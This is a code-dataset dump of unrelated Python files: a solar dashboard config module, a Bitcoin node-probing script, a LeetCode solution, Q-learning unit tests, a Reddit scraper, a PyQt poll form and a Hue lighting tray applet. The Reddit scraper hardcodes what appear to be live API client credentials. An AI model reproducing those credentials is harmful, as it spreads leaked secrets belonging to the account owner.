'ghi'\n\n\nTIMEZONE_OPTIONS = {tz: tz.replace('_', ' ') for tz in TIMEZONES}\n\n\nDEFAULT_METRICS = ['mae', 'mbe', 'rmse']\n\nDEFAULT_CATEGORIES = ['total', 'year', 'month', 'hour', 'date']\n\nALL_METRICS = {}\nALL_METRICS.update(ALLOWED_DETERMINISTIC_METRICS)\nALL_METRICS.update(ALLOWED_EVENT_METRICS)\nALL_METRICS.update(ALLOWED_PROBABILISTIC_METRICS)\n\nALLOWED_QUALITY_FLAGS = {\n 'USER FLAGGED': 'USER FLAGGED',\n 'NIGHTTIME': 'NIGHTTIME',\n 'CLEARSKY': 'CLEARSKY (GHI only)',\n 'LIMITS EXCEEDED': 'LIMITS EXCEEDED',\n 'STALE VALUES': 'STALE VALUES (includes fixed values at nighttime)',\n 'DAYTIME STALE VALUES': 'DAYTIME STALE VALUES',\n 'INTERPOLATED VALUES':\n 'INTERPOLATED VALUES (includes fixed values at nighttime)',\n 'DAYTIME INTERPOLATED VALUES': 'DAYTIME INTERPOLATED VALUES'\n}\n\nINTERVAL_LABEL_OPTIONS = {\n 'beginning': 'Beginning',\n 'ending': 'Ending',\n 'instant': 'Instant',\n 'event': 'Event',\n}\n\nREQ_REF_FX = DETREF + PROBREF + EVENTREF\n\n\ndef is_allowed(action):\n \"\"\"Returns if the action is allowed or not on the current object.\n\n Parameters\n ----------\n action: str\n The action to query for permission.\n\n Returns\n -------\n bool\n If the action is allowed or not.\n \"\"\"\n allowed = getattr(g, 'allowed_actions', [])\n return action in allowed\n\n\ndef can_create(object_type):\n \"\"\"Returns if a user can create an object type or not\n\n Parameters\n ----------\n object_type: str\n Type of object to check for create permissions. Should use the plural\n e.g. 
observations.\n\n Returns\n -------\n bool\n True if the user can create the object type, else false.\n \"\"\"\n allowed = object_type in getattr(g, 'can_create', [])\n return allowed\n\n\ndef template_variables():\n return {\n 'dashboard_version': sfa_dash.__version__,\n 'variable_options': VARIABLE_OPTIONS,\n 'default_variable': DEFAULT_VARIABLE,\n 'timezone_options': TIMEZONE_OPTIONS,\n 'metric_categories': ALLOWED_CATEGORIES,\n 'default_categories': DEFAULT_CATEGORIES,\n 'deterministic_metrics': ALLOWED_DETERMINISTIC_METRICS,\n 'default_deterministic_metrics': DEFAULT_METRICS,\n 'event_metrics': ALLOWED_EVENT_METRICS,\n 'probabilistic_metrics': ALLOWED_PROBABILISTIC_METRICS,\n 'all_metrics': ALL_METRICS,\n 'quality_flags': ALLOWED_QUALITY_FLAGS,\n 'discard_before_resample': DISCARD_BEFORE_RESAMPLE,\n 'is_allowed': is_allowed,\n 'current_path': request.path,\n 'MAX_DATA_RANGE_DAYS': current_app.config['MAX_DATA_RANGE_DAYS'].days,\n 'MAX_PLOT_DATAPOINTS': current_app.config['MAX_PLOT_DATAPOINTS'],\n 'variable_names': COMMON_NAMES,\n 'variable_unit_map': ALLOWED_VARIABLES,\n 'interval_label_options': INTERVAL_LABEL_OPTIONS,\n 'can_create': can_create,\n 'REQ_REF_FX': REQ_REF_FX\n }\n","repo_name":"SolarArbiter/solarforecastarbiter-dashboard","sub_path":"sfa_dash/template_globals.py","file_name":"template_globals.py","file_ext":"py","file_size_in_byte":3968,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"57"} +{"seq_id":"70561170098","text":"import socket\nimport struct\nimport binascii\nimport hashlib\nimport sys, re\nif sys.version_info.major < 3:\n\tsys.stderr.write('Sorry, Python 3.x needed :(\\n')\n\tsys.exit(1)\nfrom bitcoin import SelectParams\nfrom bitcoin.messages import msg_version\n\n# Good node, we think\n#HOST = '172.198.176.102'\n# Test node\n#HOST = '63.116.149.181'\n# Known node\n#HOST = 'bitcoin.coinprism.com'\nPORT = 8333\n\nHOSTS = ['136.227.27.142', \\\n\t'136.227.28.45', \\\n\t'75.104.60.47', \\\n\t'75.104.60.190', \\\n\t'136.227.27.93', \\\n\t'123.138.54.159', \\\n\t'24.17.108.172', \\\n\t'123.58.55.110', \\\n\t'136.227.111.41', \\\n\t'159.19.99.225', \\\n\t'69.207.178.52', \\\n\t'bitcoin.coinprism.com']\n\nfor HOST in HOSTS:\n\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.settimeout(1)\n\n\tdata = \"\"\n\n\ttry:\n\t\ts.connect((HOST, PORT))\n\t\tmsg = msg_version()\n\t\ts.send(msg.to_bytes())\n\t\tdata = s.recv(1024)\n\texcept socket.timeout:\n\t\tprint(\"Timeout\")\n\texcept socket.error:\n\t\tprint(\"No clue but error\")\n\n\tif re.search(\"Satoshi\", str(data)):\n\t\tprint(HOST, \" Hurray! :)\\n\")\n\telse:\n\t\tprint(HOST, \" Boo! 
:(\\n\")\n\n\ts.close()\n","repo_name":"jmahboob/BitcoinNodeFinder","sub_path":"bitcoin_library_test.py","file_name":"bitcoin_library_test.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"18511385","text":"from typing import List\n\n\nclass Solution:\n def minimumTeachings(self, n: int, languages: List[List[int]], friendships: List[List[int]]) -> int:\n need_friends = set() # 需要学习语言才能交流的好友列表\n\n languages = [set(language) for language in languages]\n\n for u, v in friendships:\n if not languages[u - 1] & languages[v - 1]:\n need_friends.add(u)\n need_friends.add(v)\n\n language_knows_num = [0] * n # 每种语言在需要学习语言的好友中已学习的数量\n for friend in need_friends:\n for i in languages[friend - 1]:\n language_knows_num[i - 1] += 1\n\n return len(need_friends) - max(language_knows_num)\n\n\nif __name__ == \"__main__\":\n # 1\n print(Solution().minimumTeachings(n=2, languages=[[1], [2], [1, 2]], friendships=[[1, 2], [1, 3], [2, 3]]))\n\n # 2\n print(Solution().minimumTeachings(n=3, languages=[[2], [1, 3], [1, 2], [3]],\n friendships=[[1, 4], [1, 2], [3, 4], [2, 3]]))\n","repo_name":"ChangxingJiang/LeetCode","sub_path":"1701-1800/1733/1733_Python_1.py","file_name":"1733_Python_1.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"71422579377","text":"\"\"\"\nContains the unit tests for the improved Q-learning, \nwhich is a hand-coded model-free reinforcement model.\n\"\"\"\nimport os\n\nimport pytest\nimport numpy as np\n\nfrom improved_q_learning import Improved_q_learning\n\n@pytest.fixture\ndef test_ai():\n \"\"\"\n Returns an instance of the AI to use for testing.\n \"\"\"\n return Improved_q_learning()\n\ndef test_play(test_ai):\n \"\"\"\n Tests the 'play' method of the class.\n \"\"\"\n\n initial_state = np.array([[-1, 0, 0],\n [0, 1, 0],\n [0, 0, 0]])\n \n new_state = test_ai.play(initial_state)\n\n # Checking that the AI played once and only once\n assert new_state.sum() == 1\n assert np.count_nonzero(new_state == 1) == 2\n assert np.count_nonzero(new_state == -1) == 1\n # Making sure that the values previously stored in the array were \n # not changed\n assert new_state[0, 0] == -1\n assert new_state[1, 1] == 1\n\n\n\ndef test_should_explore(test_ai):\n \"\"\"\n Tests the 'should_explore' method.\n \"\"\"\n\n # We pick 0.5 as a state value, i.e. an average move.\n state_value = 0.5\n \n # Making sure the AI never decides to explore when its exploration\n # rate is 0.\n test_ai.exploration_rate = 0\n for i in range(100):\n assert not test_ai.should_explore(state_value)\n \n # Checking that the AI will always explore if the state_value is 0,\n # i.e. 
if the best possible move has always led to defeat in the past,\n # and the exploration rate is 1\n test_ai.exploration_rate = 1\n state_value = 0\n for i in range(100):\n assert test_ai.should_explore(state_value)\n\n\ndef test_load_training_data(test_ai):\n \"\"\"\n Tests the 'load_training_data' method.\n \"\"\"\n if os.path.exists(\"training.json\"):\n # Checking the format of the training data.\n training_data = test_ai.load_training_data()\n\n assert isinstance(training_data, list)\n if training_data != []:\n state = training_data[-1]\n assert isinstance(state, dict)\n assert set((\"array\", \"value\", \"occurences\")) <= state.keys()\n assert type(state[\"array\"]) == np.ndarray\n assert isinstance(state[\"value\"], float) and 0 <= state[\"value\"] <= 1\n assert isinstance(state[\"occurences\"], int) and state[\"occurences\"] > 0\n\n\n else:\n # Making sure an empty list is returned if the training file \n # was not found.\n assert test_ai.load_training_data() == []\n\n\ndef test_update_training_data(test_ai):\n \"\"\"\n Tests the 'update_training_data' method.\n \"\"\"\n\n state = np.array([[1, 1, -1],\n [0, -1, 1],\n [0, 0, -1]])\n\n dummy_training_data = [\n {\n \"array\": state,\n \"value\": 0.5,\n \"occurences\": 2\n }\n ]\n\n test_ai.training_data = dummy_training_data\n test_ai.update_training_data(state, 0.2)\n\n # Making sure that state value and occurences count have been properly updated\n assert test_ai.training_data[0][\"occurences\"] == 3\n assert round(test_ai.training_data[0][\"value\"], 1) == 0.4\n\ndef test_write_training_data(test_ai):\n \"\"\"\n Tests the 'write_training_data' method.\n \"\"\"\n\n state = np.array([[1, 1, -1],\n [0, -1, 1],\n [0, 0, -1]])\n\n dummy_training_data = [\n {\n \"array\": state,\n \"value\": 0.5,\n \"occurences\": 2\n }\n ]\n test_ai.training_data = dummy_training_data\n test_ai.write_training_data()\n\n # Making sure that the training data have not been altered after \n # saving them in the JSON ant opening them again.\n test_ai.load_training_data()\n\n assert dummy_training_data == test_ai.training_data\n\n","repo_name":"vinpap/tic_tac_toe","sub_path":"test/test_improved_q_learning.py","file_name":"test_improved_q_learning.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"26562672729","text":"import praw\nimport pandas as pd\nimport numpy as np\nimport enum\n'Finally, note that the value of submission.num_comments may not match up 100% with the number of comments extracted via PRAW. 
' \\\n'This discrepancy is normal as that count includes deleted, removed, and spam comments.'\n\n'Source : https://praw.readthedocs.io/en/latest/tutorials/comments.html'\n\nreddit = praw.Reddit(client_id ='jL_MW1s2qeizKg',\n client_secret='YiCB2KsvL4azFKPsxNA0KaIkpEo',\n user_agent='qweqwdsafsa')\nStone_anime = {1: 'c9gm0u',\n 2: 'ccbm1g',\n 3: 'cf8ad3',\n 4: 'ci3lz0',\n 5: 'cl4wqu',\n 6: 'co372p',\n 7: 'cr756a',\n 8: 'cuerhp',\n 9: 'cxhrr4',\n 10: 'd0hgfr',\n 11: 'd3q43y',\n 12: 'd6vtkq',\n 13: 'da19xh',\n 14: 'dd86iy',\n 15: 'dgg1qa',\n 16: 'djodqq',\n 17: 'dmy9sy',\n 18: 'dq52vc',\n 19: 'dtgzdp',\n 20: 'dwscka',\n 21: 'e02lfb',\n 22: 'e3g5n8',\n 23: 'e708er',\n 24: 'ea5gi2'\n\n}\n\nStone_anime_max_ep = 25\n\nStone_votes = []\n\nfor i in range(1, Stone_anime_max_ep):\n posts = reddit.submission(id=Stone_anime[i])\n s_votes = posts.score\n Stone_votes.append(s_votes)\n\nepno_stone = np.arange(1,25)\n\nstone_ep = []\n\nfor i in epno_stone:\n s_name = 'Episode '+str(i)\n stone_ep.append(s_name)\n\n\nslime_df = pd.DataFrame({'Episodes' : stone_ep,'Upvotes' : Stone_votes})\nslime_df.to_csv('D:\\Python\\Senku Sentiment Analyzer 2.0\\Post Upvotes\\ Dr Stone episodes posts votes .csv',encoding='utf-8-sig')\n\n","repo_name":"WeebMogul/Senku-Sentiment-Analyzer-2.0","sub_path":"Post Upvotes/Upvote get.py","file_name":"Upvote get.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"15692514483","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\nimport pandas as pd\r\nfrom PyQt5.QtWidgets import QMessageBox\r\n\r\n\r\nclass Ui_MemberPoll(object):\r\n def refreshGroupPage(self):\r\n from GroupPage import Ui_GroupPage\r\n self.window = QtWidgets.QMainWindow()\r\n self.ui = Ui_GroupPage()\r\n self.ui.setupUi(self.window)\r\n self.window.show()\r\n\r\n \r\n\r\n def submitMemberPoll(self):\r\n df = pd.read_csv('MemberPoll.csv')\r\n # MemberPollID,GroupID,AffectedMemberID,Type,Yes,No,Total\r\n affectedMemberName = self.comboBox.currentText()\r\n typepoll = self.comboBox_2.currentText()\r\n dfnamecheck = pd.read_csv('UserData.csv')\r\n fullname = affectedMemberName.split();\r\n firstname = fullname[0]\r\n for index, row in dfnamecheck.iterrows():\r\n if row['First_Name'] == firstname:\r\n affectedMemberID = row['UserID']\r\n \r\n dfgroup = pd.read_csv('GroupData.csv')\r\n currentGroupRow = dfgroup[dfgroup['currentGroup'] == 1]\r\n currentGroupID = currentGroupRow['GroupID'].iloc[0]\r\n\r\n\r\n new_row = {'MemberPollID': (len(df.index)+1),\r\n 'GroupID' : currentGroupID, # UNKOWN FOR NOW (LINK WITH GROUP ID VALUE == 1)\r\n 'AffectedMemberID' : affectedMemberID, # MATCH WITH FIRST NAME\r\n 'FirstName' : firstname,\r\n 'Type' : typepoll,\r\n 'Yes' : 1,\r\n 'No' : 0,\r\n 'Total' : 0\r\n }\r\n df = df.append(new_row, ignore_index=True)\r\n df.to_csv('MemberPoll.csv', index = False)\r\n\r\n msg = QMessageBox()\r\n msg.setWindowTitle(\"Publish Poll\")\r\n msg.setText(\"Poll has been published! 
Wait for at least 60% of Members to Respond before Results!\")\r\n x = msg.exec_()\r\n\r\n\r\n def setupUi(self, MemberPoll):\r\n MemberPoll.setObjectName(\"MemberPoll\")\r\n MemberPoll.resize(400, 300)\r\n self.centralwidget = QtWidgets.QWidget(MemberPoll)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n\r\n self.comboBox = QtWidgets.QComboBox(MemberPoll)\r\n self.comboBox.setGeometry(QtCore.QRect(60, 180, 271, 22))\r\n self.comboBox.setObjectName(\"comboBox\")\r\n self.comboBox.addItem(\"\")\r\n self.comboBox.addItem(\"\")\r\n self.comboBox.addItem(\"\")\r\n self.comboBox.addItem(\"\")\r\n self.comboBox.addItem(\"\")\r\n self.comboBox.addItem(\"\")\r\n self.comboBox.addItem(\"\")\r\n \r\n self.textBrowser = QtWidgets.QTextBrowser(MemberPoll)\r\n self.textBrowser.setGeometry(QtCore.QRect(20, 50, 351, 28))\r\n self.textBrowser.setObjectName(\"textBrowser\")\r\n self.comboBox_2 = QtWidgets.QComboBox(MemberPoll)\r\n self.comboBox_2.setGeometry(QtCore.QRect(60, 85, 271, 22))\r\n self.comboBox_2.setObjectName(\"comboBox_2\")\r\n self.comboBox_2.addItem(\"\")\r\n self.comboBox_2.addItem(\"\")\r\n self.comboBox_2.addItem(\"\")\r\n self.textBrowser_2 = QtWidgets.QTextBrowser(MemberPoll)\r\n self.textBrowser_2.setGeometry(QtCore.QRect(20, 145, 351, 28))\r\n self.textBrowser_2.setObjectName(\"textBrowser_2\")\r\n\r\n self.PublishPostButton = QtWidgets.QPushButton(self.centralwidget)\r\n self.PublishPostButton.setGeometry(QtCore.QRect(10, 0, 80, 30))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Arial\")\r\n self.PublishPostButton.setFont(font)\r\n self.PublishPostButton.setObjectName(\"Publish\")\r\n self.PublishPostButton.clicked.connect(self.submitMemberPoll) # BEGIN TO PUBLISH POST\r\n self.PublishPostButton.clicked.connect(MemberPoll.close)\r\n self.PublishPostButton.clicked.connect(self.refreshGroupPage)\r\n\r\n self.retranslateUi(MemberPoll)\r\n QtCore.QMetaObject.connectSlotsByName(MemberPoll)\r\n\r\n def retranslateUi(self, MemberPoll):\r\n _translate = QtCore.QCoreApplication.translate\r\n MemberPoll.setWindowTitle(_translate(\"MemberPoll\", \"MemberPoll\"))\r\n self.textBrowser.setHtml(_translate(\"MemberPoll\", \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0//EN\\\" \\\"http://www.w3.org/TR/REC-html40/strict.dtd\\\">\\n\"\r\n\"<html><head><meta name=\\\"qrichtext\\\" content=\\\"1\\\" /><style type=\\\"text/css\\\">\\n\"\r\n\"p, li { white-space: pre-wrap; }\\n\"\r\n\"</style></head><body style=\\\" font-family:\\'MS Shell Dlg 2\\'; font-size:7.8pt; font-weight:400; font-style:normal;\\\">\\n\"\r\n\"<p style=\\\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\\\"><span style=\\\" font-family:\\'MS Shell Dlg 2\\';\\\">Select Member In Drop Down Menu</span></p></body></html>\"))\r\n \r\n userZero = \" \"\r\n userOne = \" \"\r\n userTwo = \" \"\r\n userThree = \" \"\r\n userFour = \" \"\r\n userFive = \" \"\r\n userSix = \" \"\r\n userSeven = \" \"\r\n df = pd.read_csv('GroupData.csv')\r\n for index, row in df.iterrows():\r\n if row['currentGroup'] == 1:\r\n userZero = userZero + row['Member0']\r\n userOne = userOne + row['Member1']\r\n userTwo = userTwo + row['Member2']\r\n userThree = userThree + row['Member3']\r\n userFour = userFour + row['Member4']\r\n userFive = userFive + row['Member5']\r\n userSix = userSix + row['Member6']\r\n userSeven = userSeven + row['Member7']\r\n \r\n self.comboBox.setItemText(0, _translate(\"MemberPoll\", userZero)) \r\n self.comboBox.setItemText(1, _translate(\"MemberPoll\", userOne)) 
\r\n self.comboBox.setItemText(2, _translate(\"MemberPoll\", userTwo)) \r\n self.comboBox.setItemText(3, _translate(\"MemberPoll\", userThree)) \r\n self.comboBox.setItemText(4, _translate(\"MemberPoll\", userFour)) \r\n self.comboBox.setItemText(5, _translate(\"MemberPoll\", userFive)) \r\n self.comboBox.setItemText(6, _translate(\"MemberPoll\", userSix)) \r\n self.comboBox.setItemText(7, _translate(\"MemberPoll\", userSeven)) \r\n\r\n self.comboBox_2.setItemText(0, _translate(\"MemberPoll\", \"Vote to Send Warning to Member\"))\r\n self.comboBox_2.setItemText(1, _translate(\"MemberPoll\", \"Vote to Kick Member Out\"))\r\n self.comboBox_2.setItemText(2, _translate(\"MemberPoll\", \"Vote to Send Compliment to Member\"))\r\n self.PublishPostButton.setText(_translate(\"CreatePost\", \"Publish\"))\r\n self.textBrowser_2.setHtml(_translate(\"MemberPoll\", \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0//EN\\\" \\\"http://www.w3.org/TR/REC-html40/strict.dtd\\\">\\n\"\r\n\"<html><head><meta name=\\\"qrichtext\\\" content=\\\"1\\\" /><style type=\\\"text/css\\\">\\n\"\r\n\"p, li { white-space: pre-wrap; }\\n\"\r\n\"</style></head><body style=\\\" font-family:\\'MS Shell Dlg 2\\'; font-size:7.8pt; font-weight:400; font-style:normal;\\\">\\n\"\r\n\"<p style=\\\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\\\"><span style=\\\" font-family:\\'MS Shell Dlg 2\\';\\\">Select Polling Action</span></p></body></html>\"))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n MemberPoll = QtWidgets.QMainWindow()\r\n ui = Ui_MemberPoll()\r\n ui.setupUi(MemberPoll)\r\n MemberPoll.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"ctan01/CSC322Project","sub_path":"CreateMemberPoll.py","file_name":"CreateMemberPoll.py","file_ext":"py","file_size_in_byte":7246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"21287475205","text":"\"\"\"\nlicht.app\n\n@author: phdenzel\n\"\"\"\nimport os\nimport logging\nimport signal\nimport licht\nfrom licht.rest import LichtClient\nimport gi\ngi.require_version(\"Gtk\", \"3.0\")\ngi.require_version(\"AppIndicator3\", \"0.1\")\nfrom gi.repository import Gtk, Gdk, AppIndicator3\n\n\nclass LichtIndicator(object):\n\n def __init__(self, root, app_name='licht', icon_path=None):\n self.app = root\n self.app_name = app_name\n if icon_path is not None:\n self.icon_path = icon_path\n else:\n self.icon_path = licht.icon_path\n self.icon_path = os.path.expanduser(self.icon_path)\n logging.info(f'Loading icon {self.icon_path}')\n self.indicator = AppIndicator3.Indicator.new(\n self.app_name, self.icon_path,\n AppIndicator3.IndicatorCategory.OTHER)\n self.indicator.set_status(AppIndicator3.IndicatorStatus.ACTIVE)\n menu = self.generate_menu()\n self.indicator.set_menu(menu)\n self.indicator.get_menu().connect('show', self.update)\n\n def update(self, event):\n \"\"\"\n Update all submenus\n Signal: <show>, connects to <Menu>\n \"\"\"\n menu = self.indicator.get_menu()\n data = self.app.data\n for i, item in enumerate(menu.get_children()):\n submenu = item.get_submenu()\n if submenu:\n data_attr = data.__getattribute__(submenu.get_name())\n self.update_submenu(submenu, data_attr)\n\n def generate_menu(self):\n \"\"\"\n Create a Menu containing submenus for a LichtClient's data fetch of\n lights, groups, and scenes\n \"\"\"\n menu = Gtk.Menu()\n # get data once and store\n data = self.app.data\n if data.lights is not 
None:\n item = self.menu_item(\"Lights\")\n submenu = self.generate_submenu(data.lights.names,\n device_id='lights/{}:{}')\n item.set_submenu(submenu)\n self.update_submenu(submenu, data.lights)\n menu.append(item)\n menu.append(self.separator)\n if data.groups is not None:\n item = self.menu_item(\"Rooms\")\n submenu = self.generate_submenu(data.groups.names,\n device_id='groups/{}:{}')\n item.set_submenu(submenu)\n self.update_submenu(submenu, data.groups)\n item.set_submenu(submenu)\n menu.append(item)\n menu.append(self.separator)\n if data.scenes is not None:\n item = self.menu_item(\"Scenes\")\n submenu = self.generate_submenu(data.scenes.names,\n device_id='scenes/{}:{}',\n on_off_toggle=False,\n bri_scale=False,\n ct_scale=False)\n item.set_submenu(submenu)\n menu.append(item)\n menu.append(self.separator)\n item = Gtk.MenuItem()\n item.set_label(\"Quit\")\n item.connect(\"activate\", self.app.on_exit, '')\n menu.append(item)\n menu.show_all()\n return menu\n\n def generate_submenu(self, name_index, device_id='lights/{}:{}',\n on_off_toggle=True, bri_scale=True, ct_scale=True):\n \"\"\"\n Create a Menu and populate it with MenuItems corresponding to\n a name index from data fetch\n \"\"\"\n submenu = Gtk.Menu()\n submenu.set_name(device_id.split('/')[0])\n for index, label in name_index.items():\n # Toggle on/off\n if on_off_toggle:\n check_item = self.check_item(label, bold=True, indent=0,\n device_id=device_id.format(index, 'on'),\n connect=('toggled',\n self.app.on_toggle_change))\n submenu.append(check_item)\n else:\n menuitem = self.menu_item(label, bold=False, indent=0,\n device_id=device_id.format(index, 'scene'),\n connect=('activate',\n self.app.on_activation_change))\n submenu.append(menuitem)\n # Brightness scale\n if bri_scale:\n bri_limits = licht.constants.limits_transf['bri']\n slider_item = self.slider_item(bri_limits[0], bri_limits[1], 1, _type='%',\n device_id=device_id.format(index, 'bri'),\n connect=(\"value-changed\",\n self.app.on_scroll_change))\n submenu.append(slider_item)\n # Color temperature scale\n if ct_scale:\n ct_limits = licht.constants.limits_transf['ct']\n slider_item = self.slider_item(ct_limits[0], ct_limits[1], 5, _type=\"Temp\",\n device_id=device_id.format(index, 'ct'),\n connect=(\"value-changed\",\n self.app.on_scroll_change))\n submenu.append(slider_item)\n submenu.append(self.separator)\n return submenu\n\n def update_submenu(self, menu, data):\n \"\"\"\n Update all MenuItems of a submenu corresponding to its properties\n \"\"\"\n for menu_item in menu.get_children():\n cls_name = menu_item.__class__.__name__\n if cls_name == 'SeparatorMenuItem':\n continue\n elif cls_name == 'CheckMenuItem': # Title on/off\n device_id = menu_item.get_name()\n get_subpath, state_attr = device_id.split(':')\n idx = get_subpath.split('/')[-1]\n state = data[idx][data.state_cmd][state_attr]\n menu_item.set_active(state)\n elif cls_name == 'MenuItem' and menu_item.get_children(): # Scale\n device_id = menu_item.get_name()\n get_subpath, state_attr = device_id.split(':')\n idx = get_subpath.split('/')[-1]\n if data.state_cmd not in data[idx]:\n continue\n state = data[idx][data.state_cmd][state_attr]\n # convert state depending on state_attr\n state = licht.constants.transformations[state_attr][0](state)\n slider = menu_item.get_children()[0]\n slider.set_value(state)\n\n def menu_item(self, label, checkbox=False, indent=False, bold=False,\n device_id=None, connect=None):\n \"\"\"\n Create a MenuItem and set its properties\n \"\"\"\n menuitem = 
Gtk.MenuItem()\n if indent:\n for i in range(int(indent)):\n label = f\"\\t{label}\"\n if label:\n menuitem.set_label(label)\n if bold:\n menuitem.get_children()[0].set_markup(f\"<b>{label}</b>\")\n if device_id:\n menuitem.set_name(device_id)\n if connect is not None:\n menuitem.connect(*connect)\n return menuitem\n\n def check_item(self, label, indent=False, bold=False, device_id=None,\n connect=None):\n \"\"\"\n Create a CheckMenuItem and set its properties\n \"\"\"\n menuitem = Gtk.CheckMenuItem()\n if indent:\n for i in range(int(indent)):\n label = f\"\\t{label}\"\n if label:\n menuitem.set_label(label)\n if bold:\n menuitem.get_children()[0].set_markup(f\"<b>{label}</b>\")\n if device_id:\n menuitem.set_name(device_id)\n if connect is not None:\n menuitem.connect(*connect)\n return menuitem\n\n def slider_item(self, range_min=0, range_max=100, range_inc=1,\n device_id=None, _type='%', connect=None):\n \"\"\"\n Create a MenuItem with a Scale widget and set its properties\n \"\"\"\n slider_menu = self.menu_item('')\n slider = Gtk.Scale.new_with_range(Gtk.Orientation.HORIZONTAL,\n range_min, range_max, range_inc)\n slider.set_hexpand(True)\n if connect is not None:\n slider.connect(*connect)\n if '%' in _type:\n slider.connect('format-value', self.slider_format(ps=_type))\n if \"Temp\" in _type:\n slider.connect('format-value', self.slider_format(title=_type))\n slider.set_value_pos(0) # on the left\n if device_id:\n slider_menu.set_name(device_id)\n slider.set_name(device_id)\n slider_menu.add(slider)\n slider_menu.add_events(Gdk.EventMask.SCROLL_MASK)\n slider_menu.connect('scroll-event', self.app.on_scroll)\n slider_menu.connect('button-press-event', self.app.on_scroll_click)\n return slider_menu\n\n def slider_format(self, title=\"\", ps=\"\"):\n \"\"\"\n Function factory for triggering formatting of a Scale widget's value\n Signal: <format-value>, connects to <Gtk.Scale>\n \"\"\"\n def scale_formatter(widget, value, title=title, ps=ps):\n formatted_str = \"{} {:3d}{} \".format(title, int(value), ps)\n return formatted_str\n return scale_formatter\n\n @property\n def separator(self):\n \"\"\"\n Wrapper for SeparatorMenuItem\n \"\"\"\n return Gtk.SeparatorMenuItem()\n\n\nclass LichtApplet(Gtk.Application):\n def __init__(self, app_name='licht', client=None):\n self.app_name = app_name\n self.client = client\n if self.client is None:\n self.client = LichtClient(licht.bridge_ip)\n self.indicator = LichtIndicator(self)\n\n @property\n def data(self):\n \"\"\"\n Trigger GET request for data fetch by client\n \"\"\"\n if hasattr(self, 'client'):\n data = self.client.fetch_data()\n self.data_cache = data\n return data\n\n def on_toggle_change(self, widget):\n \"\"\"\n Trigger PUT request for state change by client.\n State change specifications are drawn from the\n CheckMenuItem's name attribute and state.\n Signal: <value-changed>, connects to <CheckMenuItem>\n \"\"\"\n device_id = widget.get_name()\n get_subpath, state_attr = device_id.split(':')\n idx = get_subpath.split('/')[-1]\n data = self.data_cache.from_path(get_subpath)\n data_state = data[idx][data.state_cmd][state_attr]\n toggle_state = widget.get_active()\n if data_state != toggle_state:\n update = {state_attr: toggle_state}\n logging.info(f\"PUT: path: {data.put_path}\\tbody: {update}\")\n self.client.change_state(data=data, update=update)\n\n def on_activation_change(self, widget):\n \"\"\"\n Trigger PUT request for state change by client.\n State change specifications are drawn from the\n MenuItem's name attribute.\n 
Signal: <activate>, connects to <MenuItem>\n \"\"\"\n device_id = widget.get_name()\n get_subpath, state_attr = device_id.split(':')\n idx = get_subpath.split('/')[-1]\n data = self.data_cache.from_path(get_subpath)\n update = {state_attr: idx}\n logging.info(f\"PUT: path: {data.put_path}\\tbody: {update}\")\n self.client.change_state(subpath=data.put_path, update=update)\n\n def on_scroll_change(self, widget):\n \"\"\"\n Trigger PUT request for state change by client.\n State change specifications are drawn from the\n MenuItem's name attribute and its Scale widget state.\n Signal: <value-changed>, connects to <MenuItem>\n \"\"\"\n device_id = widget.get_name()\n get_subpath, state_attr = device_id.split(':')\n idx = get_subpath.split('/')[-1]\n data = self.data_cache.from_path(get_subpath)\n data_state = data[idx][data.state_cmd][state_attr]\n scroll_state = licht.constants.transformations[state_attr][1](\n widget.get_value())\n if data[idx][data.state_cmd]['on'] and (data_state != scroll_state):\n update = {state_attr: scroll_state}\n logging.info(f\"PUT: path: {data.put_path}\\tbody: {update}\")\n self.client.change_state(data=data, update=update)\n\n def on_scroll_click(self, widget, event):\n \"\"\"\n Manipulate the Scale widgets of a MenuItem by propagating\n the cursor position to the underlying Scale widget.\n Signal: <button-press-event>, connects to <MenuItem>\n \"\"\"\n scale = widget.get_children()[0]\n current_val = scale.get_value()\n range_min = scale.get_adjustment().get_lower()\n range_max = scale.get_adjustment().get_upper()\n walloc = widget.get_allocation()\n alloc = scale.get_allocation()\n spacing = walloc.width - alloc.width\n scale_offset = scale.get_layout().get_pixel_size()[0] + spacing\n scale_width = alloc.width - (scale_offset - alloc.x)\n cursor_x = (event.x - scale_offset) / scale_width\n val = licht.utils.linear_transformation(\n cursor_x, 0, 1, range_min, range_max,\n allow_out_of_bounds=False, as_int=True)\n if val != current_val:\n scale.set_value(val)\n\n def on_scroll(self, widget, event):\n \"\"\"\n Manipulate the Scale widget of a MenuItem.\n Signal: <scroll-event>, connects to <MenuItem>\n \"\"\"\n scale = widget.get_children()[0]\n current_val = scale.get_value()\n range_min = scale.get_adjustment().get_lower()\n range_max = scale.get_adjustment().get_upper()\n range_inc = scale.get_adjustment().get_step_increment()\n if event.direction == Gdk.ScrollDirection.UP:\n val = min(current_val+range_inc, range_max)\n elif event.direction == Gdk.ScrollDirection.DOWN:\n val = max(current_val-range_inc, range_min)\n scale.set_value(val)\n\n def on_exit(self, widget, event):\n \"\"\"\n Trigger exit from applet.\n Signal: <activate>\n \"\"\"\n Gtk.main_quit()\n\n def run(self):\n \"\"\"\n Run Gtk main\n \"\"\"\n 